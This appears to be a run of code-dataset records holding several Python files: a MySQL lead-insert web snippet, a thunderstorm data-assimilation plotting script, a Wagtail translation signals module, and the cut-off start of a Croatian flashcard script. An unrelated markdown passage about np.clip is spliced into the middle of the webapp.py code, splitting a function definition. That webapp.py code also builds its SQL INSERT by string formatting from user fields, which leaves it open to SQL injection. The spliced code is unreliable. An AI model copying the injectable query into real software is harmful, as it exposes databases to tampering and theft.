conn.cursor()\nclass Lead():\n\t\"\"\"docstring for lead\"\"\"\n\tdef __init__(self):\n\t\tself.st = True\n\n\tdef load(self, 
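The projection step in `LBQL.train`, `np.maximum(np.minimum(U, Q), L)`, clamps the Q-value into the `[L, U]` band; `np.clip` expresses the same operation more directly:

```python
import numpy as np

L, U = 1.0, 3.0
q = np.array([0.5, 2.0, 9.9])
assert np.array_equal(np.clip(q, L, U), np.maximum(np.minimum(U, q), L))
print(np.clip(q, L, U))  # [1. 2. 3.]
```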
x_dict): #The\n\t#Send the data into MySQL\n\t\tquery = 'INSERT INTO leads VALUES(\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",NOW())' % (x_dict['id'],\n\t\tx_dict['name'],x_dict['email'],x_dict['num'],x_dict['cmpn'],x_dict['note'] )\n\t\ttry:\n\t\t\tcursor.execute(query)\n\t\t\tfinal = json.dumps({'Status' : 'Success', 'ref' : x_dict['id'] })\n\t\t\tconn.commit()\n\t\texcept:\n\t\t\tfinal = json.dumps({'Status' : 'Failed. Try', 'ref' : None})\n\t\t\t\n\t\tdel query\n\t\treturn final\n\n\n\n\t# def retrieve(self, account)","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349682087","text":"import numpy as np\nfrom netCDF4 import Dataset\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport matplotlib.colors as mcolors\nimport matplotlib.patches as patches\n\nfrom matplotlib.colors import BoundaryNorm\n\nfrom tools_LT import read_evar_only, setup_12p\n\nquick = True\n#quick = False\n\ndef read_vars( INFO, tlev=0, HIM8=True ):\n\n # Read variables\n if HIM8:\n fn_Him8 = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"Him8_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_Him8 )\n nc = Dataset(fn_Him8, 'r', format='NETCDF4')\n tbb = nc.variables[\"tbb\"][tlev,:,:,:]\n nc.close()\n else:\n tbb = np.zeros(1)\n\n fn_radar = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"radar_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_radar, tlev )\n nc = Dataset(fn_radar, 'r', format='NETCDF4')\n if INFO[\"TYPE\"] is \"fcst\":\n z = nc.variables[\"z\"][tlev,:,:,:]\n vr = nc.variables[\"vr\"][tlev,:,:,:]\n else:\n z = nc.variables[\"z\"][:,:,:]\n vr = nc.variables[\"vr\"][:,:,:]\n nc.close()\n\n return( tbb, z, vr )\n\ndef main( INFO, EXP1=\"2000m_DA_0306\", EXP2=\"2000m_DA_0306\", NEXP=\"2000m_NODA_0306\",tlev=0, typ=\"anal\", tit_l=[], vname1=\"QHYD\", vname2=\"QCRG\", zlev_show=1, \n LOC=True ):\n\n data_path = \"../../dat4figs/Fig11\"\n os.makedirs( data_path, exist_ok=True )\n\n\n print( tlev, INFO[\"DT\"]*tlev )\n\n #ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n ctime = INFO[\"time0\"] + timedelta(seconds=INFO[\"DT\"]*tlev ) \n if typ is not \"fcst\":\n ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n\n INFO[\"EXP\"] = EXP1\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = typ\n if typ is not \"fcst\":\n INFO[\"time0\"] = ctime\n\n print(\"CHECK\", INFO[\"time0\"] )\n# tbb_exp1, z_exp1, vr_exp1 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp1 = read_evar_only( INFO, tlev=tlev, vname=vname2 )\n# eqh_exp1 = read_evar_only( INFO, tlev=tlev, vname=vname1 ) \n# if vname1 != \"U\" and vname1 != \"V\" and vname1 != \"W\" and vname1 != \"T\":\n# eqh_exp1 = eqh_exp1 * 1.e3\n# efp_exp1 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n#\n# INFO[\"EXP\"] = EXP2\n# tbb_exp2, z_exp2, vr_exp2 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp2 = read_evar_only( INFO, tlev=tlev, vname=vname2 )\n# eqh_exp2 = read_evar_only( INFO, tlev=tlev, vname=vname1 )\n# if vname2 != \"U\" and vname2 != \"V\" and vname2 != \"W\" and vname1 != \"T\":\n# eqh_exp2 = eqh_exp2 * 1.e3\n# efp_exp2 = 
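`Lead.load` in `webapp.py` above interpolates user data straight into the `INSERT` statement with the `%` operator, which is an SQL-injection risk, and its bare `except:` hides every failure. A hedged rewrite using MySQLdb-style parameter binding (connection and cursor are passed in so the sketch stays self-contained; the column layout mirrors `x_dict`):

```python
import json

def load(cursor, conn, x_dict):
    # %s placeholders are filled in by the driver, which escapes values safely
    query = "INSERT INTO leads VALUES (%s, %s, %s, %s, %s, %s, NOW())"
    params = (x_dict['id'], x_dict['name'], x_dict['email'],
              x_dict['num'], x_dict['cmpn'], x_dict['note'])
    try:
        cursor.execute(query, params)
        conn.commit()
        return json.dumps({'Status': 'Success', 'ref': x_dict['id']})
    except Exception:          # narrower than a bare `except`
        conn.rollback()
        return json.dumps({'Status': 'Failed. Try', 'ref': None})
```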
read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n\n ft_sec = int( INFO[\"DT\"]*tlev )\n\n\n # nature run\n # read variables\n INFO[\"EXP\"] = NEXP\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = \"fcst\"\n INFO[\"time0\"] = datetime(2001, 1, 1, 1, 0)\n tlev_nat = int( ( ctime - datetime(2001, 1, 1, 1, 0) ).total_seconds() / INFO[\"DT\"] )\n print( \"DEBUG\", tlev_nat, ctime)\n# tbb_nat, z_nat, vr_nat = read_vars( INFO, tlev=tlev_nat, HIM8=False )\n# evar_nat = read_evar_only( INFO, tlev=tlev_nat, vname=vname2 )\n# efp_nat = read_evar_only( INFO, tlev=tlev_nat, vname=\"FP\" )\n# ew_nat = read_evar_only( INFO, tlev=tlev_nat, vname=\"W\" )\n# qh_nat = read_evar_only( INFO, tlev=tlev_nat, vname=vname1 ) \n# if vname1 != \"U\" and vname1 != \"V\" and vname1 != \"W\":\n# qh_nat = qh_nat * 1.e3\n \n\n# print(\"evars: \", evar_nat.shape, evar_exp1.shape, evar_exp2.shape )\n\n\n if typ is \"fcst\":\n foot = \"\\n(fcst from mean)\"\n if ft_sec == 0:\n foot = \"\\n(analysis)\"\n foot = \"\" # DEBUG\n tit_l_ = [\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n \"\",\n ]\n else:\n foot = \"\"\n tit_l_ = [\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n ]\n\n# print( z_nat.shape, z_exp1.shape, z_exp2.shape )\n\n\n\n\n\n ax_l, crs_l, fig = setup_12p()\n\n\n levs_dbz= np.array([15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65])\n cmap_dbz = mcolors.ListedColormap(['cyan','dodgerblue', \n 'lime', 'limegreen','yellow',\n 'orange', 'red', 'firebrick', 'magenta',\n 'purple'])\n cmap_dbz.set_under('w', alpha=1.0)\n cmap_dbz.set_over('gray', alpha=1.0)\n\n cmap_rb = plt.cm.get_cmap(\"RdBu_r\")\n cmap_rb.set_under('gray', alpha=1.0)\n cmap_rb.set_over('gray', alpha=1.0)\n\n cmap_dbz = mcolors.ListedColormap(['cyan','dodgerblue',\n 'lime', 'limegreen','yellow',\n 'orange', 'red', 'firebrick', 'magenta',\n 'purple'])\n cmap_dbz.set_under('w', alpha=1.0)\n cmap_dbz.set_over('gray', alpha=1.0)\n\n unit_dbz = \"(dBZ)\"\n unit_crg = r'(nC m$^{-3}$)'\n \n if vname2 == \"QCRG\" or vname2 == \"CR\":\n levs_rb_qcrg = np.array([-0.4, -0.3, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.3, 0.4, ])\n else:\n levs_rb_qcrg = np.array([ -2.4, -2.0, -1.6, -1.2, -0.8, -0.4, \n 0.4, 0.8, 1.2, 1.6, 2, 2.4])\n\n if vname1 == \"QHYD\":\n levs_dbz = np.array([0.5, 1, 2, 4, 6, 8, 10, 12, 14, 16])\n else:\n levs_dbz = np.array([0.5, 1, 2, 3, 4, 5, 6, 7, 8, 10])\n\n\n if vname2 == \"U\" or vname2 == \"V\" or vname2 == \"W\":\n levs_rb_qcrg = np.array([ -36, -30, -24, -18, -12, -6, \n 6, 12, 18, 24, 30, 36])\n\n if vname1 == \"U\" or vname1 == \"V\" or vname1 == \"W\":\n levs_dbz = np.array([ -36, -30, -24, -18, -12, -6, \n 6, 12, 18, 24, 30, 36])\n cmap_dbz = cmap_rb\n\n\n if vname2 == \"T\":\n levs_rb_qcrg = np.array([ -36, -30, -24, -18, -12, -6, \n 6, 12, 18, 24, 30, 36])\n levs_rb_qcrg = np.arange(228, 280, 2)\n unit_crg = \"(K)\"\n \n\n levs_rb_qcrg = np.array([-0.6, -0.4, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.4, 0.6])\n\n levs_l = [ levs_dbz, levs_dbz, levs_dbz, \n levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg,\n levs_dbz, levs_dbz, levs_dbz, levs_dbz, levs_dbz, levs_dbz,\n levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, ]\n\n cmap_l = [ cmap_dbz, cmap_dbz, cmap_dbz, \n cmap_rb, cmap_rb, cmap_rb,\n cmap_dbz, cmap_dbz, cmap_dbz, cmap_dbz, cmap_dbz, cmap_dbz,\n cmap_rb, cmap_rb, cmap_rb, cmap_rb, cmap_rb, cmap_rb ]\n unit_l = [ unit_dbz, unit_dbz, unit_dbz,\n unit_crg, unit_crg, 
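`read_vars` in `Fig11_repo.py` opens each NetCDF file, slices one time level, and closes it by hand. The same access pattern with a context manager, so the file is closed even if the read raises (file and variable names here are placeholders):

```python
from netCDF4 import Dataset

def read_field(path, varname, tlev=0):
    with Dataset(path, 'r', format='NETCDF4') as nc:
        return nc.variables[varname][tlev, :, :, :]  # slicing copies data out

# z = read_field('radar_20010101020000_mean.nc', 'z')
```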
unit_crg,\n unit_dbz, unit_dbz, unit_dbz,\n unit_crg, unit_crg, unit_crg ]\n\n pnum_l = [\n \"(a)\", \"(b)\", \"(c)\",\n \"(d)\", \"(e)\", \"(f)\",\n ]\n\n tvar = vname2\n if vname2 is \"QCRG\":\n levs = levs_rb_qcrg\n cmap = cmap_rb\n unit = unit_crg\n tvar = \"Total charge density\"\n\n\n bbox = { 'facecolor':'w', 'alpha':0.95, 'pad':1.5, 'edgecolor':'w' }\n\n\n xmin = 120\n xmax = 280\n ymin = 120\n ymax = 320\n zmin = 0.0\n zmax = 15.0\n\n ft_sec_a = int( ( ctime - INFO[\"time00\"] ).total_seconds() )\n print( \"ctime\",ctime, tlev, INFO[\"DT\"])\n\n \n xlabel = \"X (km)\"\n ylabel = \"Y (km)\"\n zlabel = \"Z (km)\"\n\n xaxis = INFO[\"X\"][:] * 0.001\n yaxis = INFO[\"Y\"][:] * 0.001\n\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n xdgrid = 20\n ydgrid = 20\n\n\n# cy, cx = np.unravel_index( np.argmax(z_nat[zlev_show,:,:]), ew_nat[0,0,:,:].shape)\n\n# cx = 76\n# cy = 89\n\n# print(\"CX,CY:\", cx, cy)\n\n #cx = 98\n #cy = 106\n\n #cx = 100\n #cy = 111\n\n #cx = 84\n #cy = 95\n\n #cx = 90\n #cy = 93\n\n cx = 90\n cy = 89\n\n if typ is not \"fcst\":\n info = 't={0:.0f}min\\nZ={1:}km'.format( ft_sec_a/60, INFO[\"Z\"][zlev_show]/1000)\n else:\n info = 't={0:.0f}min\\n(FT={1:.0f}min)\\nZ={2:}km'.format( ft_sec_a/60, ft_sec/60, INFO[\"Z\"][zlev_show]/1000)\n \n\n if typ != \"fcst\":\n VAR_l = [ ]\n# z_exp1[zlev_show,:,:], \n# z_exp2[zlev_show,:,:], \n# z_nat[zlev_show,:,:],\n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:],\n# np.transpose( z_exp1[:,:,cx] ), \n# np.transpose( z_exp2[:,:,cx] ), \n# np.transpose( z_nat[:,:,cx] ), ]\n else:\n VAR_l = [ \n# #z_exp1[zlev_show,:,:], \n# #z_exp2[zlev_show,:,:], \n# #z_nat[zlev_show,:,:], \n# eqh_exp1[0,zlev_show,:,:], \n# eqh_exp2[0,zlev_show,:,:], \n# qh_nat[0,zlev_show,:,:], \n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:],\n# #np.transpose( z_exp1[:,:,cx] ), \n# #z_exp1[:,cy,:], \n# np.transpose( eqh_exp1[0,:,:,cx] ), \n# eqh_exp1[0,:,cy,:], \n# #np.transpose( z_exp2[:,:,cx] ), \n# #z_exp2[:,cy,:], \n# np.transpose( eqh_exp2[0,:,:,cx] ), \n# eqh_exp2[0,:,cy,:], \n# #np.transpose( z_nat[:,:,cx] ), \n# #z_nat[:,cy,:], \n# np.transpose( qh_nat[0,:,:,cx] ), \n# qh_nat[0,:,cy,:], \n# np.transpose( evar_exp1[0,:,:,cx]), \n# evar_exp1[0,:,cy,:], \n# np.transpose( evar_exp2[0,:,:,cx] ), \n# evar_exp2[0,:,cy,:], \n# np.transpose( evar_nat[0,:,:,cx] ),\n# evar_nat[0,:,cy,:],\n ]\n# FP_l = [ np.sum( efp_exp1[0,:,:,:], axis=0 ), \n# np.sum( efp_exp2[0,:,:,:], axis=0 ), \n# np.sum( efp_nat[0,:,:,:], axis=0 ),\n# np.sum( efp_exp1[0,:,:,:], axis=0 ),\n# np.sum( efp_exp2[0,:,:,:], axis=0 ),\n# np.sum( efp_nat[0,:,:,:], axis=0 ), \n# ]\n\n\n# if LOC:\n# inf = \"/data_honda01/honda/SCALE-LETKF/scale-LT/OUTPUT/\" + EXP2 + \"/loc.txt\"\n# loc_data = np.loadtxt( inf, delimiter=\",\", dtype='float32')\n\n for idx, ax in enumerate(ax_l):\n print(\"DEBUG\", idx, crs_l[idx]) \n\n fn = '{0:}/data{1:0=2}.npz'.format( data_path, idx )\n print( fn )\n\n xdgrid_ = xdgrid\n ydgrid_ = ydgrid\n\n xmin_ = xmin\n ymin_ = ymin\n xmax_ = xmax\n ymax_ = ymax\n\n\n if crs_l[idx] == \"ZY\":\n xaxis = INFO[\"Z\"][:] * 0.001\n yaxis = INFO[\"Y\"][:] * 0.001\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n\n ymin_ = zmin\n ymax_ = zmax\n\n ax.hlines( y=INFO[\"Z\"][zlev_show]*0.001, xmin=xmin_, xmax=xmax_,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n ax.vlines( x=INFO[\"X\"][cx]*0.001, ymin=ymin_, ymax=ymax_,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n\n ydgrid_ = 2\n xdgrid_ = 20\n\n elif 
crs_l[idx] == \"XZ\":\n xaxis = INFO[\"Y\"][:] * 0.001\n yaxis = INFO[\"Z\"][:] * 0.001\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n\n xmin_ = zmin\n xmax_ = zmax\n\n ax.hlines( y=INFO[\"Y\"][cy]*0.001, xmin=xmin_, xmax=xmax_,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n ax.vlines( x=INFO[\"Z\"][zlev_show]*0.001, ymin=ymin, ymax=ymax,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n\n\n xdgrid_ = 2\n ydgrid_ = 20\n\n elif crs_l[idx] == \"XY\":\n ax.vlines( x=INFO[\"X\"][cx]*0.001, ymin=ymin, ymax=ymax,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n ax.hlines( y=INFO[\"Y\"][cy]*0.001, xmin=xmin, xmax=xmax,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n\n# print( VAR_l[idx].shape, x2d.shape, np.max(VAR_l[idx]))\n\n norm = BoundaryNorm(levs_l[idx], ncolors=cmap_l[idx].N, clip=True)\n\n# np.savez( fn, data=VAR_l[idx][:,:], locx=loc_data[:,0],\n# locy=loc_data[:,1] )\n data = np.load( fn )['data']\n locx = np.load( fn )['locx']\n locy = np.load( fn )['locy']\n\n #SHADE = ax.pcolormesh(x2d, y2d,\n SHADE = ax.contourf(x2d, y2d,\n data,\n #VAR_l[idx][:,:],\n levels=levs_l[idx],\n #vmin=np.min(levs),\n #vmax=np.max(levs),\n cmap=cmap_l[idx],\n extend='both',\n norm=norm,\n )\n\n if LOC:\n if ( idx == 1 or idx == 4 ) and tlev == 0:\n #ax.scatter( INFO[\"X\"][loc_data[:,0]-1]*0.001, \n # INFO[\"Y\"][loc_data[:,1]-1]*0.001, \n# ax.scatter( loc_data[:,0],\n# loc_data[:,1],\n ax.scatter( locx,\n locy,\n marker='s', s=5, linewidths=0.3,\n edgecolors='k', facecolors=\"None\", alpha=1.0,\n )\n\n if typ is \"fcst\" and ft_sec > 0 and idx <= 5:\n ssize = 10.0\n idx_ = idx\n if idx > 2:\n idx_ = idx - 3\n fp2d = FP_l[idx_] \n #fp2d[ fp2d < 1.0 ] = np.nan\n #fp2d = fp2d / ssize\n fp2d = np.where( fp2d >= 1.0, ssize, np.nan )\n ax.scatter( x2d, y2d, s=fp2d, \n c='k', marker='s', \n edgecolors=\"w\", linewidths=0.5 )\n\n ax.set_xlim( xmin_, xmax_ )\n ax.set_ylim( ymin_, ymax_ )\n\n ax.xaxis.set_ticks( np.arange(xmin_, xmax_, xdgrid_) )\n ax.yaxis.set_ticks( np.arange(ymin_, ymax_, ydgrid_) )\n ax.tick_params(axis='both', which='minor', labelsize=6 )\n ax.tick_params(axis='both', which='major', labelsize=6 )\n \n if idx <= 5:\n ax.text(0.5, 0.95, tit_l_[idx],\n fontsize=12, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n\n ax.text(0.1, 0.95, pnum_l[idx],\n fontsize=10, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n\n\n xlabel_ = xlabel\n ylabel_ = ylabel\n if crs_l[idx] == \"XZ\":\n ylabel_ = \"\"\n xlabel_ = zlabel\n elif crs_l[idx] == \"ZY\":\n xlabel_ = \"\"\n ylabel_ = zlabel\n\n ax.set_xlabel( xlabel_, fontsize=6 )\n ax.set_ylabel( ylabel_, fontsize=6 )\n\n if idx <= 5:\n \n pos = ax.get_position()\n #cb_h = pos.height\n #cb_w = 0.01\n cb_h = 0.01\n cb_w = pos.width * 1.5\n ax_cb = fig.add_axes( [pos.x0, pos.y0-0.06, cb_w, cb_h] )\n cb = plt.colorbar( SHADE, cax=ax_cb, orientation = 'horizontal', \n ticks=levs_l[idx], extend='both' )\n cb.ax.tick_params( labelsize=6 )\n ax.text( 1.15, -0.12, unit_l[idx],\n fontsize=8, transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='top', )\n \n if idx == 2 or idx == 5:\n ax.text( 1.1, 1.2, info,\n fontsize=9, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='bottom', )\n\n if idx == 9 or idx == 15:\n tvar_ = tvar\n if idx == 9:\n if vname1 == \"QHYD\":\n tvar_ = \"Total hydrometeor\"\n else:\n tvar_ = vname1\n ax.text( 0.5, 1.15, tvar_,\n fontsize=13, transform=ax.transAxes,\n 
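The plotting loop pairs a `ListedColormap` with a `BoundaryNorm` so each contour bin gets exactly one color, with `set_under`/`set_over` supplying the `extend='both'` arrows. A minimal self-contained version with random data; note that `clip=False` is what lets the under/over colors show, whereas the loop above passes `clip=True`:

```python
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors

levs = np.array([15, 20, 25, 30, 35])
cmap = mcolors.ListedColormap(['cyan', 'dodgerblue', 'lime', 'yellow'])
cmap.set_under('w')
cmap.set_over('gray')
norm = mcolors.BoundaryNorm(levs, ncolors=cmap.N, clip=False)

data = np.random.default_rng(0).uniform(10, 40, size=(20, 20))
plt.contourf(data, levels=levs, cmap=cmap, norm=norm, extend='both')
plt.colorbar(ticks=levs, extend='both')
plt.show()
```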
horizontalalignment='center',\n verticalalignment='center', )\n\n# fig_tit = tvar\n# fig.suptitle( fig_tit, fontsize=16 )\n\n\n #odir = 'png/18p_DA_var/{0:}/i{1:03}_j{2:03}'.format( EXP2, cx, cy )\n odir = 'pdf/fig20210624/18p_DA_var/{0:}/i{1:03}_j{2:03}'.format( EXP2, cx, cy )\n\n ofig = '18p_{0:}_{1:}_{2:}_fta{3:05}_ft{4:05}_z{5:0=2}_{6:}_{7:}.pdf'.format(typ, EXP1, EXP2, ft_sec_a, ft_sec, zlev_show, vname1, vname2)\n\n\n print( ofig, odir )\n \n if not quick:\n os.makedirs(odir, exist_ok=True)\n plt.savefig(os.path.join(odir,ofig),\n bbox_inches=\"tight\", pad_inches = 0.1)\n plt.cla()\n plt.clf()\n plt.close('all')\n else:\n plt.show()\n\n\n\n\n###################\n\nDX = 2000.0\nDY = 2000.0\nXDIM = 192\nYDIM = 192\nTDIM = 13\nZDIM = 40\n\nXDIM = 176\nYDIM = 176\nZDIM = 45\n\nDZ = 500.0\nDT = 300\n\nX = np.arange( DX*0.5, DX*XDIM, DX )\nY = np.arange( DY*0.5, DY*YDIM, DY )\nT = np.arange( 0, DT*TDIM, DT )\nBAND = np.arange( 7, 17, 1 )\n\nZ = np.arange(DZ*0.5, DZ*ZDIM, DZ)\n\n#EXP = \"2000m_NODA_1022_FIR2km_N\"\n#time0 = datetime( 2001, 1, 1, 1, 0, 0 )\nEXP = \"2000m_DA_1022_FIR2km_N\"\n\nEXP = \"2000m_DA_0302\"\n\n\ntime0 = datetime( 2001, 1, 1, 1, 20, 0 ) \ntime0 = datetime( 2001, 1, 1, 1, 30, 0 ) \ntime0 = datetime( 2001, 1, 1, 2, 0, 0 ) \n#time0 = datetime( 2001, 1, 1, 1, 40, 0 ) \n\nGTOP = \"/data_honda01/honda/SCALE-LETKF/scale-LT/OUTPUT\"\nTYPE = \"fcst\"\nMEM = \"mean\"\nMEM = \"0025\"\ntime00 = datetime( 2001, 1, 1, 0, 0, 0 )\n\nINFO = {\"XDIM\":XDIM, \"YDIM\":YDIM, \"NBAND\":10, \"TDIM\":TDIM,\n \"X\":X, \"Y\":Y , \"BAND\":BAND, \"T\":T, \"GTOP\":GTOP,\n \"ZDIM\":ZDIM, \"Z\":Z, \"DT\":DT,\n \"TYPE\":TYPE, \"MEM\":MEM, \"EXP\":EXP,\n \"time0\": time0, \"time00\": time00 }\n\ntmax = 13\ntmax = 7\n\ntmin = 0\n#tmin = 1\ntmax = 1\n#tmin = 1\n#tmax = 7\n\ntyp = \"anal\"\ntyp = \"fcst\"\n\nvname = \"QCRG\"\n\ntit_l = [\"NODA\", \"DA\", \"Nature run\"]\n\n\nEXP1 = \"2000m_DA_0723_NOFP_30min\"\n\nEXP2 = \"2000m_DA_0723_FP_30min_LOC10km_VLOC30km\"\nEXP2 = \"2000m_DA_0723_FP_30min_LOC30km\"\n\nNEXP = \"2000m_NODA_0723\"\n\ntit_l = [\"GUESS\", \"ANAL\", \"Nature run\"]\n#tit_l = [\"GUESS\", \"ANAL(HT8)\", \"Nature run\"]\ntit_l = [\"NO GLMDA\", \"GLMDA\", \"Nature run\"]\n\n\nvname1 = \"QR\"\nvname2 = \"CR\"\n#vname1 = \"QG\"\n#vname2 = \"CG\"\n#vname1 = \"QS\"\n#vname2 = \"CS\"\n#vname1 = \"QHYD\"\n#vname2 = \"QCRG\"\n\nvname1_l = [ \n \"QHYD\", \n# \"QV\", \n# \"W\", \n# \"QR\",\n# \"QG\", \n# \"QS\", \n ]\n\nvname2_l = [ \n \"QCRG\", \n# \"T\", \n# \"V\", \n# \"CR\",\n# \"CG\", \n# \"CS\", \n ]\n\nzlev_min = 6\nzlev_max = 28\ndz = 4\n\nzlev_min = 14\ndz = 1\nzlev_max = zlev_min + dz\nzlev_max = zlev_min + 6\nzlev_max = zlev_min \n\nif typ is not \"fcst\":\n tmin = 1\n\nLOC = False\nLOC = True #False\n\nfor tlev in range( tmin, tmax ):\n if tlev > 0:\n tit_l = [\"NO GLM DA\\nforecast\", \"GLM DA\\nforecast\", \"Nature run\"]\n\n for zlev_show in range( zlev_min, zlev_max+dz, dz):\n for idx, vname1 in enumerate(vname1_l):\n INFO[\"time0\"] = time0\n main( INFO, EXP1=EXP1, EXP2=EXP2, NEXP=NEXP, tlev=tlev, typ=typ, tit_l=tit_l, vname1=vname1, vname2=vname2_l[idx], zlev_show=zlev_show, LOC=LOC )\n","sub_path":"src/Fig11_repo.py","file_name":"Fig11_repo.py","file_ext":"py","file_size_in_byte":19742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"233730736","text":"from django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models.signals import post_save, pre_delete\nfrom 
wagtail.wagtailcore.models import Site, get_page_models\n\nfrom wagtailtrans.models import Language, TranslatablePage\nfrom wagtailtrans.permissions import (\n create_group_permissions, get_or_create_language_group)\n\n\ndef synchronize_trees(sender, instance, **kwargs):\n \"\"\"synchronize the translation trees when\n a TranslatablePage is created.\n\n :param sender: Sender model\n :param instance: TranslatablePage instance\n :param kwargs: kwargs e.g. created\n\n \"\"\"\n if (\n not kwargs.get('created') or\n not getattr(instance, 'language', False) or\n not instance.language.is_default\n ):\n return\n\n try:\n instance.get_site()\n except ObjectDoesNotExist:\n return\n\n for lang in Language.objects.filter(is_default=False):\n instance.create_translation(language=lang, copy_fields=True)\n\n\ndef synchronize_deletions(sender, instance, **kwargs):\n \"\"\"We use pre_delete because when sync is disabled the foreign_key on\n canonical pages on_delete is set_null.\n\n :param sender: Sender model\n :param instance: TranslatablePage Instance\n :param kwargs: kwargs\n\n \"\"\"\n language = getattr(instance, 'language', False)\n if language and instance.is_canonical:\n instance.get_translations(only_live=False).delete()\n\n\ndef create_new_language_tree(sender, instance, **kwargs):\n \"\"\"Signal will catch creation of a new language\n If sync trees is enabled it will create a whole new tree with\n correlating language.\n\n :param sender: Sender model\n :param instance: Language instance\n :param kwargs: kwargs e.g. created\n\n \"\"\"\n if not kwargs.get('created'):\n return\n\n for site in Site.objects.all():\n site_pages = site.root_page.get_children().values_list('pk', flat=True)\n canonical_home_page = (\n TranslatablePage.objects\n .filter(pk__in=site_pages, language=Language.objects.default())\n .first())\n if not canonical_home_page:\n # no pages created yet.\n return\n descendants = canonical_home_page.get_descendants(inclusive=True)\n for child_page in descendants:\n child_page.specific.create_translation(instance, copy_fields=True)\n\n\ndef create_language_permissions_and_group(sender, instance, **kwargs):\n \"\"\"Create a new `Translator` role with it's required permissions.\n\n :param sender: Sender model\n :param instance: Language instance\n :param kwargs: kwargs e.g. 
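All the handlers in this module share one guard: do nothing unless `kwargs['created']` is truthy, i.e. react only to brand-new rows. The skeleton of that pattern, with `dispatch_uid` added so re-importing the module cannot double-connect the handler (the model name is a placeholder):

```python
from django.db.models.signals import post_save

def on_created(sender, instance, **kwargs):
    if not kwargs.get('created'):
        return  # updates to existing rows are ignored
    # ... react to the newly created instance here ...

# post_save.connect(on_created, sender=SomeModel,
#                   dispatch_uid='myapp.on_created')  # idempotent wiring
```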
created\n\n \"\"\"\n if not kwargs.get('created'):\n return\n\n group = get_or_create_language_group(instance)\n create_group_permissions(group, instance)\n\n\ndef register_signal_handlers():\n \"\"\"Registers signal handlers.\n\n To create a signal for TranslatablePage we have to use wagtails\n get_page_model.\n\n \"\"\"\n post_save.connect(create_language_permissions_and_group, sender=Language)\n\n if settings.WAGTAILTRANS_SYNC_TREE:\n post_save.connect(create_new_language_tree, sender=Language)\n\n for model in get_page_models():\n if hasattr(model, 'create_translation'):\n post_save.connect(synchronize_trees, sender=model)\n\n if hasattr(model, 'get_translations'):\n pre_delete.connect(synchronize_deletions, sender=model)\n","sub_path":"src/wagtailtrans/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"341098067","text":"import random\r\nlodg = []\r\nlpit = []\r\nred = []\r\nlbr = []\r\nlpon = []\r\nln = []\r\nodg = ''\r\nto = no = x = r = 0\r\nprint('Dobrodošli u flashcards-type igru za ponavljanje!\\nUbacite popis/e pojmova u isti folder koji su s znakom - odvojeni od svoje definicije/značenja/itd. Svaki pojam mora biti u novom redu.')\r\nime = input('Naziv datoteke: ')\r\nfile = open(ime,'r')\r\nlredovi = file.readlines()\r\nfor i in range(len(lredovi)):\r\n red = lredovi[i]\r\n a = red.split('-')\r\n lodg.append(a[0])\r\n lpit.append(a[1].replace('\\n',''))\r\n lbr.append(i)\r\nif len(lbr)>20:\r\n lpon = ['a','b','c','d','e','f','g','h']\r\nelif len(lbr)>10:\r\n lpon = 